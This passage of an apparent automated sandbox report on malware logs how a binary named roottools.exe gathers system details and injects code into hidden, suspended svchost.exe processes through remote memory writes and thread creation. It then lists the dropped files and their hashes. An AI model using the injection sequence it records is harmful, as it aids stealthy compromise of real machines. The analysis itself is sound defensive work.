Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId False 1
Fn
System Get Info type = Operating System True 3
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x77cd00a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x77ccf9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77cd1314 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x77cd19b0 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = extended True 1
Fn
Mutex Create mutex_name = C2E6ECE9938A43206F172A85684E36DB True 1
Fn
Mutex Open mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE False 1
Fn
Mutex Open mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE False 2
Fn
Process Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x320, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = 4786CF0F1E6E9E20640CE4A22DFFC997 True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Mutex Open mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE False 2
Fn
Process Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x7f8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = 35D65C8FBCA06952705002450D6712FC True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Process #16: svchost.exe
(Host: 1001, Network: 365)
+
Information Value
ID #16
File Name c:\windows\syswow64\svchost.exe
Command Line C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:05:12, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:05:01
OS Process Information
+
Information Value
PID 0x320
Parent PID 0x6a4 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7C4
0x 11C
0x 420
0x 318
0x 31C
0x 394
0x 310
0x 30C
0x 5B0
0x 7D0
0x 68C
0x 6BC
0x 650
0x 6E0
0x 478
0x 684
0x 464
0x 46C
0x 708
0x 704
0x 770
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x0008bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False
rsaenh.dll 0x000f0000 0x0012bfff Memory Mapped File Readable False False False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x00100000 0x00100fff Memory Mapped File Readable False False False
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False
index.dat 0x00120000 0x0012ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False
index.dat 0x00130000 0x0013bfff Memory Mapped File Readable, Writable True False False
index.dat 0x00140000 0x00147fff Memory Mapped File Readable, Writable True False False
index.dat 0x00150000 0x0015ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000150000 0x00150000 0x0017ffff Private Memory Readable, Writable True False False
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False
locale.nls 0x001d0000 0x00236fff Memory Mapped File Readable False False False
private_0x0000000000250000 0x00250000 0x002cffff Private Memory Readable, Writable True False False
private_0x00000000002d0000 0x002d0000 0x0032ffff Private Memory Readable, Writable True False False
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True False False
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False
private_0x00000000003c0000 0x003c0000 0x004bffff Private Memory Readable, Writable True False False
private_0x00000000004d0000 0x004d0000 0x0050ffff Private Memory Readable, Writable True False False
private_0x0000000000520000 0x00520000 0x0055ffff Private Memory Readable, Writable True False False
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000580000 0x00580000 0x00707fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000710000 0x00710000 0x00890fff Pagefile Backed Memory Readable True False False
private_0x00000000008e0000 0x008e0000 0x0091ffff Private Memory Readable, Writable True False False
svchost.exe 0x00960000 0x00967fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001d70000 0x01d70000 0x02162fff Pagefile Backed Memory Readable True False False
private_0x0000000002170000 0x02170000 0x023cffff Private Memory Readable, Writable True False False
private_0x0000000002170000 0x02170000 0x021affff Private Memory Readable, Writable True False False
private_0x00000000021d0000 0x021d0000 0x0220ffff Private Memory Readable, Writable True False False
private_0x0000000002210000 0x02210000 0x0224ffff Private Memory Readable, Writable True False False
private_0x0000000002280000 0x02280000 0x022bffff Private Memory Readable, Writable True False False
private_0x00000000022c0000 0x022c0000 0x022fffff Private Memory Readable, Writable True False False
private_0x0000000002300000 0x02300000 0x0233ffff Private Memory Readable, Writable True False False
private_0x0000000002350000 0x02350000 0x023cffff Private Memory Readable, Writable True False False
sortdefault.nls 0x023d0000 0x0269efff Memory Mapped File Readable False False False
private_0x00000000026e0000 0x026e0000 0x0271ffff Private Memory Readable, Writable True False False
private_0x0000000002720000 0x02720000 0x0275ffff Private Memory Readable, Writable True False False
private_0x0000000002790000 0x02790000 0x027cffff Private Memory Readable, Writable True False False
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False
private_0x0000000002810000 0x02810000 0x0284ffff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x0288ffff Private Memory Readable, Writable True False False
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False
private_0x0000000002950000 0x02950000 0x0298ffff Private Memory Readable, Writable True False False
private_0x0000000002990000 0x02990000 0x02b6ffff Private Memory Readable, Writable True False False
private_0x0000000002990000 0x02990000 0x02a8ffff Private Memory Readable, Writable True False False
private_0x0000000002a90000 0x02a90000 0x02acffff Private Memory Readable, Writable True False False
private_0x0000000002b30000 0x02b30000 0x02b6ffff Private Memory Readable, Writable True False False
private_0x0000000002ba0000 0x02ba0000 0x02bdffff Private Memory Readable, Writable True False False
private_0x0000000002c00000 0x02c00000 0x02c3ffff Private Memory Readable, Writable True False False
private_0x0000000002c40000 0x02c40000 0x02deffff Private Memory Readable, Writable True False False
private_0x0000000002c40000 0x02c40000 0x02ceffff Private Memory Readable, Writable True False False
private_0x0000000002c50000 0x02c50000 0x02c8ffff Private Memory Readable, Writable True False False
private_0x0000000002ca0000 0x02ca0000 0x02cdffff Private Memory Readable, Writable True False False
private_0x0000000002ce0000 0x02ce0000 0x02ceffff Private Memory Readable, Writable True False False
private_0x0000000002cf0000 0x02cf0000 0x02d9ffff Private Memory Readable, Writable True False False
private_0x0000000002d50000 0x02d50000 0x02d8ffff Private Memory Readable, Writable True False False
private_0x0000000002de0000 0x02de0000 0x02deffff Private Memory Readable, Writable True False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x75300000 0x75305fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x75310000 0x7531ffff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x75320000 0x75334fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x75340000 0x75391fff Memory Mapped File Readable, Writable, Executable False False False
schannel.dll 0x753a0000 0x753d9fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x753e0000 0x753f6fff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x75400000 0x75443fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x75450000 0x75470fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75480000 0x7548afff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x75490000 0x7562dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x756a0000 0x756a5fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x756b0000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x756d0000 0x756dcfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x756e0000 0x756e6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x76020000 0x760a2fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x767f0000 0x767f5fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76900000 0x76944fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
wintrust.dll 0x76a40000 0x76a6cfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x777e0000 0x77814fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007ef92000 0x7ef92000 0x7ef94fff Private Memory Readable, Writable True False False
private_0x000000007ef95000 0x7ef95000 0x7ef97fff Private Memory Readable, Writable True False False
private_0x000000007ef98000 0x7ef98000 0x7ef9afff Private Memory Readable, Writable True False False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 69 entries are omitted.
The remaining entries can be found in flog.txt.
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x70000, size = 114688 True 1
Fn
Data
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x876c4, size = 4 True 1
Fn
Data
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x877d0, size = 4 True 1
Fn
Data
Modify Memory #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x87d38, size = 4 True 1
Fn
Data
Create Remote Thread #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x6a8 address = 0x795bc True 1
Fn
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\g[1].txt 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ew[1].txt 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\jw[1].txt 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\0wqaga[1].txt 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe 192.00 KB (196608 bytes) MD5: 71c63dd6822598c7f7c7ab4c9ceb6ba9
SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca
SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083
False
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp 52.71 KB (53978 bytes) MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
False
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp 126.77 KB (129813 bytes) MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt 0.27 KB (281 bytes) MD5: 7372fbe29d49e31bd4002a12ff10b319
SHA1: b49450a4a7844b312769bd7ae0628aa1f0426efe
SHA256: 1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt 48.62 KB (49787 bytes) MD5: 5bce4a525f0d6dba211e09b60f144bf9
SHA1: 09f4d50cd2573e52623a19c40d987508d5c09bcb
